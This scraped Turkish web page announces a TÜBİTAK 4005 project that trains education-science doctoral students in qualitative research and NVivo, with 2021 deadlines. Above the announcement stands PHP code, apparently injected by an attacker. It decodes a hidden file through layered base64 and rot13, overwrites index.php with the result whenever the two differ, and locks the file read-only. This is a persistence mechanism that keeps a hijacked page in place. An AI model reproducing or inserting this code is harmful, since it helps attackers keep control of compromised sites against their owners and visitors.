$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Ntay 4

Anasayfa

TÜBİTAK 4005 “Alan Uzmanlarıyla Nitel Temelli Araştırmalara Yolculuk IV” projesinde; eğitim
bilimleri alanındaki doktora öğrencilerinin nitel temelli araştırmalara yönelik ihtiyaçlarının
karşılanması amaçlanmaktadır. Ayrıca son zamanlarda uluslararası literatürde önem kazanan
nitel temelli araştırmalara (nitel ve karma) yönelik katılımcıların bilgi ve becerilerini geliştirmek ve
bilimsel araştırmaya yönelik olumlu bakış açısı kazanmalarını sağlamak amaçlanmaktadır.
Bununla birlikte teknolojinin gelişmesiyle birlikte veri analizinin daha düzgün ve planlı bir şekilde
yapılmasını sağlayan Nvivo programına ilişkin uygulamaların gerçekleştirilmesi amaçlanmaktadır.
Bu amaçlar gerçekleştirilirken, alan yazında günlük yaşamla ilişki kurması açısından önemli bir
yere sahip olan örnek olay yönteminin kullanılması amaçlanmaktır.

 

Başvuru İçin Son Tarih 1 Ağustos 2021
Katılımcı Listesinin Duyurulması 4 Ağustos 2021
Katılımcılar İçin Kesin Kayıt Onay Verme Son Tarihi 9 Ağustos 2021
PROJE TARİHİ 11-18 Eylül 2021